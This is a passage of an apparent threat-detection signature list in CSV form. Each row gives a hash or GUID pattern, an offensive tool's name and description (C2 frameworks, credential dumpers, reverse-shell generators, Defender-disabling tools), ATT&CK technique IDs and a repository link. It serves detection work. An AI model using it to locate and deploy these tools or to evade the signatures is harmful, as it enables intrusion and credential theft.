T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*a1b3d36a9cc4bc118c646ae5430a6e0fc811f2ec3614a3de9682b5c07eaade2d*",".{0,1000}a1b3d36a9cc4bc118c646ae5430a6e0fc811f2ec3614a3de9682b5c07eaade2d.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tools","https://github.com/CiscoCXSecurity/linikatz","1","0","N/A","10","5","493","75","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z" "*a1dcb84528551c983c11159b99c9d9ba1d3aa75659d9a16a4ca8204a6ada397d*",".{0,1000}a1dcb84528551c983c11159b99c9d9ba1d3aa75659d9a16a4ca8204a6ada397d.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*a1dd724e09ca85a8265c4486f699ab32882e7204a09f895397ab0fb02e37559e*",".{0,1000}a1dd724e09ca85a8265c4486f699ab32882e7204a09f895397ab0fb02e37559e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*A1ECD50DA8AAE5734A5F5C4A6A951B5F3C99CC4FB939AC60EF5EE19896CA23A0*",".{0,1000}A1ECD50DA8AAE5734A5F5C4A6A951B5F3C99CC4FB939AC60EF5EE19896CA23A0.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*A1F54816-3FBA-4A71-9D26-D31C6BE9CF01*",".{0,1000}A1F54816\-3FBA\-4A71\-9D26\-D31C6BE9CF01.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*a201bc3c2d47775b39cd90b32eb390e7*",".{0,1000}a201bc3c2d47775b39cd90b32eb390e7.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*A220F564-41CB-46F5-9938-FEFD87819771*",".{0,1000}A220F564\-41CB\-46F5\-9938\-FEFD87819771.{0,1000}","offensive_tool_keyword","WDBypass","Disable Windows Defender (+ UAC Bypass, + Upgrade to SYSTEM)","T1089 - T1562.001 - T1548.002","TA0005 - TA0040 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://bitbucket.org/evilgreyswork/wd-uac/downloads/","1","0","https://blog.injectexp.dev/2024/02/28/disable-windows-defender-uac-bypass-upgrade-to-system/","10","10","N/A","N/A","N/A","N/A" "*a222df9c30fc7adacb7553a9899a3512e18b9e8d2b735bcd5210c800ba99b243*",".{0,1000}a222df9c30fc7adacb7553a9899a3512e18b9e8d2b735bcd5210c800ba99b243.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*a239aa784fa1dfdd3bb50c20c21b03dbc3ce364f940bec5d23faca835c2e5417*",".{0,1000}a239aa784fa1dfdd3bb50c20c21b03dbc3ce364f940bec5d23faca835c2e5417.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*a243a5df3e04b3a555b3f506b36037d0093a22c0b8e5842a8890bc4610855cdb*",".{0,1000}a243a5df3e04b3a555b3f506b36037d0093a22c0b8e5842a8890bc4610855cdb.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*a25b9df135c7a09348526cb0ffdd1e486b7cc6c16df811d83ef1d5402ec1f8ad*",".{0,1000}a25b9df135c7a09348526cb0ffdd1e486b7cc6c16df811d83ef1d5402ec1f8ad.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*a25c5e7baec3573c2a78872808c709d702714f3a11e57d06b62244c3eca2a834*",".{0,1000}a25c5e7baec3573c2a78872808c709d702714f3a11e57d06b62244c3eca2a834.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*a276ed1739c3380b2e918da23ddac04cc117e17e08dac219bb4f82783f9f9850*",".{0,1000}a276ed1739c3380b2e918da23ddac04cc117e17e08dac219bb4f82783f9f9850.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*a280f960cb4fc01ec2dbb4fe56f17122523878a9ece3713868244fbd95e7d7e6*",".{0,1000}a280f960cb4fc01ec2dbb4fe56f17122523878a9ece3713868244fbd95e7d7e6.{0,1000}","offensive_tool_keyword","Rev-Shell","Basic script to generate reverse shell payloads","T1055.011 - T1021.005 - T1560.001","TA0002 - TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/washingtonP1974/Rev-Shell","1","0","N/A","3","10","27","1","2024-03-20T13:58:21Z","2024-03-20T13:37:12Z" "*a2b402f23bed2afebdda5ca21f7bc705a021ad86a35676cd3b55c7aa56406e0f*",".{0,1000}a2b402f23bed2afebdda5ca21f7bc705a021ad86a35676cd3b55c7aa56406e0f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*a2c2db4fb0e2ec86fbdda64d1fdf5a084d036073ffd366c1c56336c4c5c95bf1*",".{0,1000}a2c2db4fb0e2ec86fbdda64d1fdf5a084d036073ffd366c1c56336c4c5c95bf1.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*a2d412b6feac0c34d148158e5791940e5060bf4b9e6db33e7c444bf715553dc6*",".{0,1000}a2d412b6feac0c34d148158e5791940e5060bf4b9e6db33e7c444bf715553dc6.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*a314666c9d3b9d80540bb50378fe104b1c509fa239bc80567f26492f76c526b0*",".{0,1000}a314666c9d3b9d80540bb50378fe104b1c509fa239bc80567f26492f76c526b0.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*A315E53B-397A-4074-B988-535A100D45DC*",".{0,1000}A315E53B\-397A\-4074\-B988\-535A100D45DC.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*a315f75d50a2c54a6d1bb84cca077e6894870d8a1e60010ffd1307a295c8b9f7*",".{0,1000}a315f75d50a2c54a6d1bb84cca077e6894870d8a1e60010ffd1307a295c8b9f7.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*a324c19c7df7c2c63f4fc17bc8e1554e4261a27c18cd68c47cc08602f480d60f*",".{0,1000}a324c19c7df7c2c63f4fc17bc8e1554e4261a27c18cd68c47cc08602f480d60f.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*a32cdeddc7deb6d2ac210ec304930da4e9c6763975d72685fd7108ad48883715*",".{0,1000}a32cdeddc7deb6d2ac210ec304930da4e9c6763975d72685fd7108ad48883715.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","N/A","7","1","60","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z" "*a3546da8bf7e18eb991cf72b2d702c6b07997140959f9ef56ba64b2673bbd7fd*",".{0,1000}a3546da8bf7e18eb991cf72b2d702c6b07997140959f9ef56ba64b2673bbd7fd.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*A38C04C7-B172-4897-8471-E3478903035E*",".{0,1000}A38C04C7\-B172\-4897\-8471\-E3478903035E.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","5","417","103","2024-02-23T14:13:01Z","2019-04-20T14:51:18Z" "*A38C04C7-B172-4897-8471-E3478903035E*",".{0,1000}A38C04C7\-B172\-4897\-8471\-E3478903035E.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","5","417","103","2024-02-23T14:13:01Z","2019-04-20T14:51:18Z" "*a3adf686eebbb786431c1df3c1988eb013877596d162ed642fb7e52e285e7296*",".{0,1000}a3adf686eebbb786431c1df3c1988eb013877596d162ed642fb7e52e285e7296.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*a3afae22698d3cb4d3f9fff03a42ccf61b3666bd6ef5c455ce6488b6788883a3*",".{0,1000}a3afae22698d3cb4d3f9fff03a42ccf61b3666bd6ef5c455ce6488b6788883a3.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*A3h1nt/gimmeSH*",".{0,1000}A3h1nt\/gimmeSH.{0,1000}","offensive_tool_keyword","gimmeSH","gimmeSH. is a tool that generates a custom cheatsheet for Reverse Shell. File Transfer and Msfvenom within your terminal. you just need to provide the platform. your Internet protocol address and your port number.","T1059 T1505","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/A3h1nt/gimmeSH","1","1","N/A","N/A","2","183","29","2021-08-27T03:12:15Z","2021-08-02T07:22:15Z" "*a4284269b4058b687af441673ccc1a09dbd013d3dc54546848837ed44e0023af*",".{0,1000}a4284269b4058b687af441673ccc1a09dbd013d3dc54546848837ed44e0023af.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*a43f8c6f567c0280ddb10660ab9a00f492741d3c4e668c2ca8ea171dc30cb083*",".{0,1000}a43f8c6f567c0280ddb10660ab9a00f492741d3c4e668c2ca8ea171dc30cb083.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*a441bc5046ec91f60d5a185edbee6a17e309c87f3268bb9c45bb9c83bb28ec23*",".{0,1000}a441bc5046ec91f60d5a185edbee6a17e309c87f3268bb9c45bb9c83bb28ec23.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*A45C184F-F98F-4258-A928-BFF437034791*",".{0,1000}A45C184F\-F98F\-4258\-A928\-BFF437034791.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*a4635952ba5d7927ceb57a1533c38a7a55a4835de85c4794fa85d863866d5588*",".{0,1000}a4635952ba5d7927ceb57a1533c38a7a55a4835de85c4794fa85d863866d5588.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*A46C9A13-145E-42C0-8CA6-CC920BF1D9F1*",".{0,1000}A46C9A13\-145E\-42C0\-8CA6\-CC920BF1D9F1.{0,1000}","offensive_tool_keyword","prefetch-tool","Windows KASLR bypass using prefetch side-channel CVE-2024-21345 exploitation","T1564.007","TA0004","N/A","N/A","Privilege Escalation","https://github.com/exploits-forsale/prefetch-tool","1","0","N/A","8","1","47","7","2024-04-26T05:40:32Z","2024-04-26T05:00:27Z" "*a475f8e5b3581cb7b93cd3021478957ec5997aa3995c1a686fb87ae6c84ec2b1*",".{0,1000}a475f8e5b3581cb7b93cd3021478957ec5997aa3995c1a686fb87ae6c84ec2b1.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","0","N/A","10","3","209","47","2024-03-24T16:47:03Z","2024-03-24T16:36:46Z" "*a4cc9799fdba898f24de68be43dff98a9c8a153dbf016fdd042127e4b31bbc34*",".{0,1000}a4cc9799fdba898f24de68be43dff98a9c8a153dbf016fdd042127e4b31bbc34.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1059 - T1547 - T1068 - T1562 - T1110 - T1083 - T1021 - T1071","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","0","N/A","10","10","617","209","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" "*a4e7e725eb3998e5dadef0f903eb5e5f3e2b879876b239a891de5f95ecb2c1c4*",".{0,1000}a4e7e725eb3998e5dadef0f903eb5e5f3e2b879876b239a891de5f95ecb2c1c4.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*a4fee85a73d5192f1daa887e5357eb1304acd73425842f7ed690783c2a27a26f*",".{0,1000}a4fee85a73d5192f1daa887e5357eb1304acd73425842f7ed690783c2a27a26f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*a50cefaf5e3c111224055a9e3e4d289c7c44dc0d8405bf96a52f8c6d254aaeca*",".{0,1000}a50cefaf5e3c111224055a9e3e4d289c7c44dc0d8405bf96a52f8c6d254aaeca.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*a52770362aceeca8d893ccb0fcfdf76991a94dc3e9cac0e595c897d1392dcaac*",".{0,1000}a52770362aceeca8d893ccb0fcfdf76991a94dc3e9cac0e595c897d1392dcaac.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*a5323adc6557587f17fc2766b95efbf76e5148dbc14b744cbf72b40bdc40f601*",".{0,1000}a5323adc6557587f17fc2766b95efbf76e5148dbc14b744cbf72b40bdc40f601.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*a56757ad65727fec369f36a7c892618170bcdf89c22712d1c4010899c6ae9239*",".{0,1000}a56757ad65727fec369f36a7c892618170bcdf89c22712d1c4010899c6ae9239.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*A5B912EC-D588-401C-A84F-D01F98142B9E*",".{0,1000}A5B912EC\-D588\-401C\-A84F\-D01F98142B9E.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*a5e673ab3d8d4159b611981668487376eb2c61e3e3715dea1b50ec18d64eef76*",".{0,1000}a5e673ab3d8d4159b611981668487376eb2c61e3e3715dea1b50ec18d64eef76.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*a5f10cdd2cd38b2b33a091c60f0e194aafd3a2de3ccbf80333882430a90034b6*",".{0,1000}a5f10cdd2cd38b2b33a091c60f0e194aafd3a2de3ccbf80333882430a90034b6.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*a60cd6fd8facc92366caa76747ede2aba9c04a166f55d1ae6b84b264d0f2e5b1*",".{0,1000}a60cd6fd8facc92366caa76747ede2aba9c04a166f55d1ae6b84b264d0f2e5b1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation 